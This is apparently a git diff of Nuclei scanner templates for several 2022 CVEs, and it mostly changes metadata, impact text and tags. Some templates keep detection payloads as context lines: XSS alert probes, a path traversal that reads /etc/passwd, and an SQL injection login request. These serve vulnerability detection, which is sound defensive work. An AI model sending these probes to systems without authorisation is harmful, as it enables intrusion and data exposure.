potential compromise of the entire system. remediation: | To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. Implement parameterized queries or use an ORM framework to prevent SQL injection attacks. reference: @@ -18,13 +20,13 @@ info: cve-id: CVE-2022-3800 cwe-id: CWE-89,CWE-707 epss-score: 0.05291 - epss-percentile: 0.9224 + epss-percentile: 0.92303 cpe: cpe:2.3:a:ibax:go-ibax:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ibax product: go-ibax - tags: cve,cve2022,ibax,go-ibax,sqli + tags: cve2022,cve,ibax,go-ibax,sqli http: - raw: @@ -44,4 +46,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "usesysid")' condition: and -# digest: 4a0a00473045022100934ba5d04aa07cd474eb481b0bca831262123af234281cf39432593b3ddab504022078b1fe69094beb2fdaa8f0ef2095d30cc8eb8bb0a86ffa430d9efacdc838d83a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201f15cc161ca0936b83e8f97725a8c7682727e50af295464970a0119f45333c8902202333cca77720c53959b684542fef75975bccfe288152444357d2657e50a796ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-38295.yaml b/nuclei-templates/CVE-2022/CVE-2022-38295.yaml index d2c139164b..95f0612c1b 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-38295.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-38295.yaml @@ -6,25 +6,28 @@ info: severity: medium description: | Cuppa CMS v1.0 was discovered to contain a cross-site scripting vulnerability at /table_manager/view/cu_user_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field under the Add New Group function. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information. remediation: | To remediate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-38295 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-38295 cwe-id: CWE-79 - epss-score: 0.00304 - epss-percentile: 0.66373 + epss-score: 0.00269 + epss-percentile: 0.64416 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: cuppacms product: cuppacms - tags: cve,cve2022,xss,cuppa,authenticated + tags: cve2022,cve,xss,cuppa,authenticated,cuppacms http: - raw: @@ -64,4 +67,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203f5040ad3f2d2453967d88e55a8121ac7e1c74da698eced01fa0d9a03253c17b02203c502d66470e5e75fac9319b4687409b96e8fcbdc2f0513d64d20c3f86df9470:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205702724d42507ffc7d8cd044e6d6cf80b1f1c0a3064667003638e86af6920a29022100c1aa20860b9fe2846eca8e70f515a44501a69d01c6e6e2f1e78c634a549800ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-38296.yaml b/nuclei-templates/CVE-2022/CVE-2022-38296.yaml index 7c96276beb..8a18e4b952 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-38296.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-38296.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Cuppa CMS v1.0 was discovered to contain an arbitrary file upload vulnerability via the File Manager. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution and compromise of the affected system. remediation: | Apply the latest patch or upgrade to a newer version of Cuppa CMS to mitigate this vulnerability. reference: @@ -16,15 +18,15 @@ info: cvss-score: 9.8 cve-id: CVE-2022-38296 cwe-id: CWE-434 - epss-score: 0.02096 - epss-percentile: 0.87892 + epss-score: 0.02351 + epss-percentile: 0.88674 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: cuppacms product: cuppacms - tags: cve,cve2022,rce,cuppa,intrusive + tags: cve,cve2022,rce,cuppa,intrusive,cuppacms http: - raw: @@ -101,5 +103,4 @@ http: regex: - '"name":"(.*?)",' internal: true - -# digest: 490a0046304402206c48e4e04449fb8d85169d5ce90e19645e08b2b71062e52151d12bdc14ac854002205ad324b660bc8fc8e70208fa68e15aa2e63f62b787260d9a24144ed1dcc6c882:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008e6f64cbcac30a77559654a774f32ae62113b17ec9d03eef4da8a86d796f2d2d0220687c6d62f1c3abc958148a0289f7076ec9819d04b320980f98c45a7caa8288a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-38463.yaml b/nuclei-templates/CVE-2022/CVE-2022-38463.yaml index db0bb75a2f..910d6cdbc6 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-38463.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-38463.yaml @@ -6,19 +6,33 @@ info: severity: medium description: | ServiceNow through San Diego Patch 4b and Patch 6 contains a cross-site scripting vulnerability in the logout functionality, which can enable an unauthenticated remote attacker to execute arbitrary JavaScript. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, data theft, or defacement of the affected ServiceNow instance. + remediation: | + Apply the latest security patches provided by ServiceNow to mitigate this vulnerability. reference: - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1156793 - https://nvd.nist.gov/vuln/detail/CVE-2022-38463 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-38463 cwe-id: CWE-79 + epss-score: 0.00174 + epss-percentile: 0.53646 + cpe: cpe:2.3:a:servicenow:servicenow:san_diego:patch_4:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: servicenow + product: servicenow shodan-query: http.title:"ServiceNow" - verified: "true" tags: cve,cve2022,servicenow,xss -requests: + +http: - method: GET path: - "{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)" @@ -38,5 +52,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 +# digest: 4a0a004730450220602dde2b93eb0d41d3c031c0120a9007197dfb886c56eb72c39a68e752d55dde022100f6fd085c092dc14047ca0974a626fcb410641ff5f391c3d454c2707f5efd823a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-38467.yaml b/nuclei-templates/CVE-2022/CVE-2022-38467.yaml index b607bd6f6c..fa85aa016a 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-38467.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-38467.yaml @@ -6,19 +6,22 @@ info: severity: medium description: | The plugin does not sanitise and escape some parameters from a sample file before outputting them back in the page, leading to Reflected Cross-Site Scripting + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 1.1.1 reference: - https://wpscan.com/vulnerability/4b128c9c-366e-46af-9dd2-e3a9624e3a53 - https://wordpress.org/plugins/crm-perks-forms/ - https://nvd.nist.gov/vuln/detail/CVE-2022-38467 - https://patchstack.com/database/vulnerability/crm-perks-forms/wordpress-crm-perks-forms-plugin-1-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-38467 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29471 + epss-score: 0.00092 + epss-percentile: 0.37951 cpe: cpe:2.3:a:crmperks:crm_perks_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +29,7 @@ info: vendor: crmperks product: crm_perks_forms framework: wordpress - tags: crm-perks-forms,wpscan,cve,cve2022,wordpress,wp,wp-plugin,xss + tags: cve2022,cve,crm-perks-forms,wpscan,wordpress,wp,wp-plugin,xss,crmperks http: - raw: @@ -44,4 +47,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_1, "CRM Perks Forms") && contains(body_2, "")' condition: and -# digest: 4b0a00483046022100f2e96fa8e2f33594ebe69730808cd1319a4e112bde5900e0c038365c8d97a2c0022100da6791e48390b50f50e0644023b66807addb14aa8739e079b3a78f0cbc2c578b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220729431423049e0675d567b6cbd1d77e01b4e70f542ae8a569d9765cf8dcd344b02205d87faab9dfcd79998b0d0e68c7e91eb95180dd93bf447409ae8c7579e50761b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-38553.yaml b/nuclei-templates/CVE-2022/CVE-2022-38553.yaml index eb2d6a07b6..faef6326e0 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-38553.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-38553.yaml @@ -6,22 +6,33 @@ info: severity: medium description: | Academy Learning Management System before 5.9.1 contains a cross-site scripting vulnerability via the Search parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade to Academy Learning Management System version 5.9.1 or later to mitigate the XSS vulnerability. reference: - https://www.youtube.com/watch?v=yFiZffHoeKs&ab_channel=4websecurity - https://github.com/4websecurity/CVE-2022-38553 - https://codecanyon.net/item/academy-course-based-learning-management-system/22703468 - https://nvd.nist.gov/vuln/detail/CVE-2022-38553 + - http://academy.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-38553 cwe-id: CWE-79 + epss-score: 0.00218 + epss-percentile: 0.5972 + cpe: cpe:2.3:a:creativeitem:academy_learning_management_system:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: creativeitem + product: academy_learning_management_system google-query: intext:"Study any topic, anytime" - verified: "true" - tags: cve,cve2022,academylms,xss + tags: cve2022,cve,academylms,xss,creativeitem -requests: +http: - method: GET path: - '{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E' @@ -43,5 +54,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/18 +# digest: 490a004630440220198f27be524ccad8572426583afc7404f4eadb4ee97c8673dfcc45c69474e4cc02205db8821d527e95ccb104e194cba4ad01b37bd10b23d007f2b2b49dd6dbc40b62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-38637.yaml b/nuclei-templates/CVE-2022/CVE-2022-38637.yaml index b97430b29e..e66c68ee6d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-38637.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-38637.yaml @@ -6,21 +6,33 @@ info: severity: critical description: | Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/user-login.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.youtube.com/watch?v=m8nW0p69UHU - https://owasp.org/www-community/attacks/SQL_Injection - https://nvd.nist.gov/vuln/detail/CVE-2022-38637 + - https://github.com/Henry4E36/POCS + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-38637 cwe-id: CWE-89 + epss-score: 0.01231 + epss-percentile: 0.85126 + cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: hospital_management_system_project + product: hospital_management_system shodan-query: http.html:"Hospital Management System" - verified: "true" - tags: cve,cve2022,hms,cms,sqli,auth-bypass + tags: cve,cve2022,hms,cms,sqli,auth-bypass,hospital_management_system_project -requests: +http: - raw: - | POST /hms/user-login.php HTTP/1.1 @@ -31,7 +43,7 @@ requests: host-redirects: true max-redirects: 2 - cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -44,5 +56,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/09/28 +# digest: 4a0a00473045022100a8383f340fa0dfe055b740805fc9006b8240efd45919da33d427bf756f32ea3002202ce22932462286045aba1b3fcbf86f9f3abb7035232fbf32730b0d01b48c2f4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-38794.yaml b/nuclei-templates/CVE-2022/CVE-2022-38794.yaml index 9b84d5d12c..2975a09d86 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-38794.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-38794.yaml @@ -6,6 +6,10 @@ info: severity: high description: | Zaver through 2020-12-15 is vulnerable to local file inclusion via the GET /.. substring. + impact: | + This vulnerability can lead to unauthorized access, data leakage, and remote code execution. + remediation: | + To remediate this vulnerability, ensure that user input is properly validated and sanitized before being used in file inclusion operations. reference: - https://github.com/zyearn/zaver/issues/22 - https://nvd.nist.gov/vuln/detail/CVE-2022-38794 @@ -14,9 +18,16 @@ info: cvss-score: 7.5 cve-id: CVE-2022-38794 cwe-id: CWE-22 - tags: cve,cve2022,lfi,zaver + epss-score: 0.00536 + epss-percentile: 0.7469 + cpe: cpe:2.3:a:zaver_project:zaver:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zaver_project + product: zaver + tags: cve,cve2022,lfi,zaver,zaver_project -requests: +http: - method: GET path: - '{{BaseURL}}/../../../../../../../../etc/passwd' @@ -31,5 +42,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2023/01/15 +# digest: 490a0046304402200ed779a9f9687940b2962eb1cb81f498633c303dafce9c65a87715c7441bba2302202d18e5e190defccdc3cd1e37a554cbd556bac428d069591d6ebf5e90df3e8ba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-38817.yaml b/nuclei-templates/CVE-2022/CVE-2022-38817.yaml index bddabf805e..8ab0162bf2 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-38817.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-38817.yaml @@ -6,6 +6,10 @@ info: severity: high description: | Dapr Dashboard 0.1.0 through 0.10.0 is susceptible to improper access control. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + The vulnerability allows unauthorized access to the Dapr Dashboard, potentially leading to unauthorized actions and data exposure. + remediation: | + Upgrade Dapr Dashboard to a version that includes the fix for CVE-2022-38817 or apply the necessary patches provided by the vendor. reference: - https://github.com/dapr/dashboard/issues/222 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38817 @@ -15,11 +19,18 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-38817 + cwe-id: CWE-306 + epss-score: 0.01019 + epss-percentile: 0.82099 + cpe: cpe:2.3:a:linuxfoundation:dapr_dashboard:*:*:*:*:*:*:*:* metadata: + max-request: 3 + vendor: linuxfoundation + product: dapr_dashboard shodan-query: http.title:"Dapr Dashboard" - tags: cve,cve2022,dapr,dashboard,unauth + tags: cve,cve2022,dapr,dashboard,unauth,linuxfoundation -requests: +http: - method: GET path: - "{{BaseURL}}/components/statestore" @@ -27,6 +38,7 @@ requests: - "{{BaseURL}}/controlplane" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -37,5 +49,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/03 +# digest: 4a0a00473045022100ed31baef3a743912069b65ba5acc47646dcaf490915517bdd8e0e7ad7000e63002201f52667a811d396e971bdb076b9e20faf5f2855da5529fd33c7f57c62aca15cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-38870.yaml b/nuclei-templates/CVE-2022/CVE-2022-38870.yaml index 924cfb8f0b..c3317573fc 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-38870.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-38870.yaml @@ -6,19 +6,32 @@ info: severity: high description: | Free5gc 3.2.1 is susceptible to information disclosure. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access to sensitive information. + remediation: | + Apply the latest patch or upgrade to a patched version of Free5gc 3.2.1 to mitigate the vulnerability. reference: - https://github.com/free5gc/free5gc/issues/387 - https://nvd.nist.gov/vuln/detail/CVE-2022-38870 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-38870 cwe-id: CWE-306 + epss-score: 0.01064 + epss-percentile: 0.83839 + cpe: cpe:2.3:a:free5gc:free5gc:3.2.1:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: free5gc + product: free5gc shodan-query: http.title:"free5GC Web Console" tags: cve,cve2022,free5gc,exposure -requests: +http: - raw: - | GET /api/subscriber HTTP/1.1 @@ -42,5 +55,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/03 +# digest: 4a0a00473045022100b1bc52241353b36e1a5999a82f529fbbc762b7a9979290d5bbe230ab8d331b1102201bfc8ecd065a544dbcd51dd648a5542814bd55243221a48cceccfba368e17784:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-39048.yaml b/nuclei-templates/CVE-2022/CVE-2022-39048.yaml index 4250b60977..09b8437870 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-39048.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-39048.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-39048 cwe-id: CWE-79 - epss-score: 0.00677 - epss-percentile: 0.77612 + epss-score: 0.01306 + epss-percentile: 0.8443 cpe: cpe:2.3:a:servicenow:servicenow:quebec:-:*:*:*:*:*:* metadata: verified: true @@ -69,4 +69,4 @@ http: regex: - 'name="sysparm_ck" id="sysparm_ck" type="hidden" value="(.*?)"' internal: true -# digest: 4a0a00473045022100992e1dd03c6d5d5aa09f7f5387e88166ddd0d8bec7b003d880ee1cfc20a22f38022020ed1b040a15795f6038e2a095403a90dce53851de5fa03bcdd6cc53cd3dd55a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202102f0fca3b27948107e82e0f1edb665eef04e734cb8223f72f8610fd0a77db7022100f66594372604dbb07eac6b1f2e2eaa0d92054b7cf0f0179d3f3b2278a84506fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-3908.yaml b/nuclei-templates/CVE-2022/CVE-2022-3908.yaml index ed5c636839..9876676e44 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-3908.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-3908.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Helloprint plugin before 1.4.7 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, potentially allowing an attacker to execute malicious scripts on the victim's browser. remediation: Fixed in version 1.4.7. reference: - https://wpscan.com/vulnerability/c44802a0-8cbe-4386-9523-3b6cb44c6505 @@ -16,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-3908 cwe-id: CWE-79 - epss-score: 0.00078 - epss-percentile: 0.32966 + epss-score: 0.00119 + epss-percentile: 0.45893 cpe: cpe:2.3:a:helloprint:helloprint:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: vendor: helloprint product: helloprint framework: wordpress - tags: xss,wordpress,wp-plugin,helloprint,cve,cve2022,wp,authenticated,wpscan + tags: cve,cve2022,xss,wordpress,wp-plugin,helloprint,wp,authenticated,wpscan http: - raw: @@ -46,4 +48,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "Translation added\\\"> successfully")' condition: and -# digest: 480a00453043021f3f4f4f0a8159dabce7f86a6e1c603ffec853df2c793b85ee6225a49bf65c8202207f27cc7050749b3d13223a28bb01b26cbc8c4dc32e03bc096c07307860eb3c3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207e286204c09dd09c8f88d70cfffd4057fb812e02c12e9f8d003c9cbe275bac56022046153de04d2c4740670bdce031f4191724837e97543756dad26a518e21d528f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-39195.yaml b/nuclei-templates/CVE-2022/CVE-2022-39195.yaml index bc2b68f019..17f9d4d0d6 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-39195.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-39195.yaml @@ -6,36 +6,48 @@ info: severity: medium description: | LISTSERV 17 web interface contains a cross-site scripting vulnerability. An attacker can inject arbitrary JavaScript or HTML via the "c" parameter, thereby possibly allowing the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/170552/LISTSERV-17-Cross-Site-Scripting.html - https://peach.ease.lsoft.com/scripts/wa-PEACH.exe?A0=LSTSRV-L - https://packetstormsecurity.com/2301-exploits/listserv17-xss.txt - https://nvd.nist.gov/vuln/detail/CVE-2022-39195 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-39195 cwe-id: CWE-79 + epss-score: 0.00211 + epss-percentile: 0.58386 + cpe: cpe:2.3:a:lsoft:listserv:17.0:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: lsoft + product: listserv shodan-query: http.html:"LISTSERV" - verified: "true" - tags: cve,cve2022,xss,listserv,packetstorm + tags: cve,cve2022,xss,listserv,packetstorm,lsoft -requests: +http: - method: GET path: - "{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E" - "{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E" stop-at-first-match: true + matchers-condition: and matchers: - type: word words: - "" - "LISTSERV" - condition: and case-insensitive: true + condition: and - type: word part: header @@ -45,5 +57,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/03 +# digest: 4a0a00473045022100deb484913d771058cb07f05ff44b039c31713806ae1d7dc76ab917a696784c1602204cc67b35d929a40ecbf2769707cf7c05748309ec523759fa82bd301d0c1751f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-3933.yaml b/nuclei-templates/CVE-2022/CVE-2022-3933.yaml index c6539a674c..824a6907a9 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-3933.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-3933.yaml @@ -6,18 +6,22 @@ info: severity: medium description: | WordPress Essential Real Estate plugin before 3.9.6 contains an authenticated cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters, which can allow someone with a role as low as admin to inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow theft of cookie-based authentication credentials and launch of other attacks. + impact: | + An authenticated attacker can inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or further attacks. remediation: Fixed in version 3.9.6. reference: - https://wpscan.com/vulnerability/6395f3f1-5cdf-4c55-920c-accc0201baf4 - https://wordpress.org/plugins/essential-real-estate/advanced/ - https://nvd.nist.gov/vuln/detail/CVE-2022-3933 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-3933 cwe-id: CWE-79 - epss-score: 0.00086 - epss-percentile: 0.3585 + epss-score: 0.00092 + epss-percentile: 0.37956 cpe: cpe:2.3:a:g5theme:essential_real_estate:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +29,7 @@ info: vendor: g5theme product: essential_real_estate framework: wordpress - tags: wpscan,cve2022,authenticated,wordpress,wp-plugin,wp,essential-real-estate,cve,xss + tags: cve,cve2022,wpscan,authenticated,wordpress,wp-plugin,wp,essential-real-estate,xss,g5theme http: - raw: @@ -47,4 +51,4 @@ http: - 'contains(body_2, ">")' - 'contains(body_2, "ere_property_gallery")' condition: and -# digest: 490a00463044022062d1c6b68cd40ad93b63a960b638bd8399b9953e855a83e9488a1e6baabccd9702202f67993c36673d31fa7f3ccf3cb0d2bb38797bd6b15fe66a0b7af249da5cdf05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200fe935b7c005247f683b953718e68e4676806de61fba39833160c8503149843f0220541a0e4a4597d27026619f26e233f4d496a8860c45a55e6254286e1975f5b1d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-3934.yaml b/nuclei-templates/CVE-2022/CVE-2022-3934.yaml index cfea70a449..5dbc2c3283 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-3934.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-3934.yaml @@ -6,17 +6,22 @@ info: severity: medium description: | WordPress FlatPM plugin before 3.0.13 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape certain parameters before outputting them back in pages, which can be exploited against high privilege users such as admin. An attacker can steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 3.0.13. reference: - https://wpscan.com/vulnerability/ab68381f-c4b8-4945-a6a5-1d4d6473b73a - https://nvd.nist.gov/vuln/detail/CVE-2022-3934 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-3934 cwe-id: CWE-79 - epss-score: 0.00086 - epss-percentile: 0.3585 + epss-score: 0.00092 + epss-percentile: 0.37956 cpe: cpe:2.3:a:mehanoid:flat_pm:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,7 +29,7 @@ info: vendor: mehanoid product: flat_pm framework: wordpress - tags: authenticated,wpscan,cve,cve2022,xss,flatpm,wordpress,wp-plugin + tags: cve2022,cve,authenticated,wpscan,xss,flatpm,wordpress,wp-plugin,mehanoid http: - raw: @@ -45,4 +50,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "alert(document.domain)") && contains(body_2, "Flat PM")' condition: and -# digest: 4a0a0047304502206107a1dfa22655f5d418b0eb109b56aae50b4fccee9b2521c23c9593b208e98e022100ee009d704733d31e1c446c04573156c6a208b59fae8cad5fea60ec81aa7e500c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022055fba672dad146e93dacb3d50e8711c24f62824a1537c6528e556035e547b531022100c5aff9e112c142313578fb3dfb3657b394dd081730b12452893b6e84b0fa8007:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-3980.yaml b/nuclei-templates/CVE-2022/CVE-2022-3980.yaml index 1caac015ab..a0550b3a6f 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-3980.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-3980.yaml @@ -6,18 +6,21 @@ info: severity: critical description: | An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server or conduct server-side request forgery (SSRF) attacks. remediation: | Apply the latest security patches or updates provided by Sophos to mitigate the vulnerability. reference: - https://www.sophos.com/en-us/security-advisories/sophos-sa-20221116-smc-xee - https://nvd.nist.gov/vuln/detail/CVE-2022-3980 + - https://github.com/bigblackhat/oFx classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 